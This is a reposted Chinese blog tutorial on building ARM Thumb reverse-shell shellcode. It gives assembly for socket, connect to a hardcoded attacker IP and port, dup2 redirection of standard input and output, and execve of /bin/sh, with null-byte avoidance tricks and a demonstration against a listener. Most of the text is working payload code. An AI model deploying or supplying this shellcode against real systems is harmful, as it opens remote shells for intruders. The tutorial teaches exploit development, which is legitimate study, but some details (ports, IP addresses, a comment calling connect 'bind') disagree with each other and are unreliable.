ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

ARM exploit编写三

2020-02-03 15:04:58  阅读:302  来源: 互联网

标签:调用 r0 r1 r2 sockid exploit 寄存器 编写 ARM


上一个实验中我们已经介绍了reverse shell(反向shell)的原理,再回顾一下
在reverse shell的场景下,内网的机器会主动连接到外网的几次上,比如作为攻击者,我们会在系统上开放一个监听端口,等待来自目标主机的弹回的连接。
在这里插入图片描述
同样,还是先看看C语言是怎么实现的。
完整代码在reverse.c中
第一步是确定必要的系统函数,其参数和系统调用号。 看看给出的C代码,我们可以看到我们需要以下函数:socket,connect,dup2,execve。 可以使用以下命令计算出这些函数的系统调用号:
以socket为例
在这里插入图片描述
用这样办法,得到的系统调用号如下
在这里插入图片描述
每个函数涉及的参数可以使用man xxx来查看,以execve为例
在这里插入图片描述
已经整理好,如下所示
在这里插入图片描述
下一步是弄清楚这些参数的具体值。 一种方法是使用strace查看成功的reverse shell连接。 Strace是一种工具,可用于跟踪系统调用并监视进程与Linux内核之间的交互。 让我们使用strace来测试我们reverse shell的C版本。 为了避免无关代码的干扰,我们使用-e将输出限制为我们感兴趣的功能。
这里注意,因为是反向连接,而且我在源码里写死的端口是1337,所以我们需要在另一个终端中先监听端口
在这里插入图片描述
然后再运行生成的可执行文件

在这里插入图片描述在这里插入图片描述
然后输入whoami命令测试
在这里插入图片描述

现在可以根据strace的输出得到我们需要传递给reverse shell用到的函数的参数值了
整理如下
在这里插入图片描述

接下来我们将每个函数拆分为单独的块,并重复以下过程

  1. 确定哪个参数对应哪个寄存器
  2. 确定如何将所需的值传递给寄存器,包括:
  3. 如何将立即数传递给寄存器
    2.如何在不直接将#0移入其中的情况下使寄存器中不存在null byte(我们需要在代码中避免使用空字节,因此必须找到其他方法来使寄存器或内存中的值无效)
    3. 如何使寄存器指向存储器中存储常量和字符串的区域
  4. 使用正确的系统调用号来调用该函数并跟踪寄存器内容的更改:
    1. 系统调用的结果将落在r0中,这意味着如果需要在另一个函数中重用该函数的结果,则需要在调用函数之前将其保存到另一个寄存器中。
  5. 示例:host_sockid = socket(2,1,0)–套接字调用的结果(host_sockid)将到达r0。这个结果在监听(host_sockid,2)等其他函数中重用,因此应该保存在另一个寄存器中。

首先我们切换到Thumb模式
要降低遇到空字节的可能性,首先应该使用Thumb模式。在Arm模式下,指令为32位,在Thumb模式下,指令为16位。这意味着我们可以通过简单地减小指令的大小来减少空字节的可能性。要将模式从ARM更改为Thumb,请将下一条指令地址(位于pc中)的LSB(最低有效位)设置为1,方法是将pc寄存器的值加1并保存到另一个寄存器中。然后使用BX(分支和交换)指令分支到包含下一条指令地址的另一个寄存器,LSB设置为1,这使得处理器切换到Thumb模式。
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3

在这里插入图片描述
从这里开始,将编写Thumb代码,因此需要在代码中使用.THUMB指令来指明这一点。

接下来我们要创建一个新的socket
在这里插入图片描述
socket调用参数所需的值可以通过如下命令得到:
在这里插入图片描述
设置参数后,使用svc指令调用套接字系统调用。 这个调用的结果将是我们的sockid并将结束在r0。由于我们以后需要sockid,让我们把它保存到r4。
在ARMv7 +中,您可以使用movw指令并将任何立即值放入寄存器。在ARMv6中,不能简单地将任何立即值移动到寄存器中,而必须将其拆分为两个较小的值。
为了通过rotator.py检查是否可以使用某个直接值,
在这里插入图片描述
上图是使用rotator.py的两个示例,可以看到281不能作为立即数,200可以
经过这一步分析,我们可以得到部分代码,如下所示
.THUMB
mov r0, #2
mov r1, #1
sub r2, r2
mov r7, #200
add r7, #81 // r7 = 281 (socket 系统调用号)
svc #1 // r0 = sockid 的值
mov r4, r0 // 将sockid保存在 r4

第二步是连接
在这里插入图片描述
使用第一条指令,我们将存储在文字池中的结构对象(包含地址族,主机端口和主机地址)的地址放入R0。 文字池是存储常量,字符串或偏移量的同一部分中的内存区域(因为文字池是代码的一部分)。 当然也可以使用带标签的ADR指令,而不是手动计算pc相对偏移量。 ADR接受PC相对表达式,即带有可选偏移量的标签,其中标签的地址相对于PC标签。 像这样:
// connect(r0, &sockaddr, 16)
adr r1, struct // pointer to struct
[…]
struct:
.ascii “\x02\xff” // AF_INET 0xff will be NULLed
.ascii “\x11\x5c” // port number 4444
.byte 192,168,139,130 // IP Address
在第一条指令中,我们将R1指向存储区域,在该区域中存储地址族AF_INET,我们要使用的本地端口和IP地址的值。 STRB指令用x00替换\ x02 \ xff中的占位符xff,将AF_INET设置为\ x02 \ x00。
STRB指令将一个字节从寄存器存储到计算的存储区域。 语法[r1,#1]表示我们将R1作为基址,将立即值(#1)作为偏移量。 我们怎么知道它是一个空字节存储? 因为r2仅包含0(由于“sub r2,r2,r2”指令清除了寄存器)。
move指令将sockaddr结构的长度(AF_INET为2个字节,PORT为2个字节,ipaddress为4个字节,8个字节填充= 16个字节)放入r2。 然后,因为r7已经包含来自上一次系统调用的281,我们通过简单地向它添加2来将r7设置为283。
// connect(r0, &sockaddr, 16)
adr r1, struct // pointer to struct
strb r2, [r1, #1] // write 0 for AF_INET
mov r2, #16 // struct length
add r7, #2 // r7 = 281+2 = 283 (bind syscall number)
svc #1

接下来处理STDIN,STDOUT,stderr
在这里插入图片描述
对于dup2函数,我们需要系统调用号63.保存的sockid需要再次移入r0,子指令将r1设置为0.对于剩余的两个dup2调用,我们只需要更改r1并将r0重置为 每个系统调用后的sockid即可。
/* dup2(sockid, 0) /
mov r7, #63 // r7 = 63 (dup2 syscall number)
mov r0, r4 // r4 is the saved client_sockid
sub r1, r1 // r1 = 0 (stdin)
svc #1
/
dup2(sockid, 1) /
mov r0, r4 // r4 is the saved client_sockid
add r1, #1 // r1 = 1 (stdout)
svc #1
/
dup2(sockid, 2) */
mov r0, r4 // r4 is the saved client_sockid
add r1, #1 // r1 = 1+1 (stderr)
svc #1

最后就是派生shell了
在这里插入图片描述
// execve("/bin/sh", 0, 0)
adr r0, binsh // r0 = location of “/bin/shX”
sub r1, r1 // clear register r1. R1 = 0
sub r2, r2 // clear register r2. R2 = 0
strb r2, [r0, #7] // replace X with 0 in /bin/shX
mov r7, #11 // execve syscall number
svc #1
nop // nop needed for alignment
这里涉及的execve我们之前已经详细讲过了,这里不再赘述。
我们将值AF_INET(带有0xff,将被替换为null),端口号,IP地址和“/ bin / shX”字符串放在我们的汇编代码末尾。
struct_addr:
.ascii “\x02\xff” // AF_INET 0xff will be NULLed
.ascii “\x11\x5c” // port number 4444
.byte 10,0,2,15 // IP Address
binsh:
.ascii “/bin/shX”
将全部的片段组装起来就得到了完整的shellcode,在reverse_shell.s
同样还是先监听
在这里插入图片描述
再执行
在这里插入图片描述
测试whoami命令看看
在这里插入图片描述
成功了
最后一步还是将其转为16进制字符串

在这里插入图片描述

Neil-Yale 发布了334 篇原创文章 · 获赞 98 · 访问量 41万+ 他的留言板 关注

标签:调用,r0,r1,r2,sockid,exploit,寄存器,编写,ARM
来源: https://blog.csdn.net/yalecaltech/article/details/104156661

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有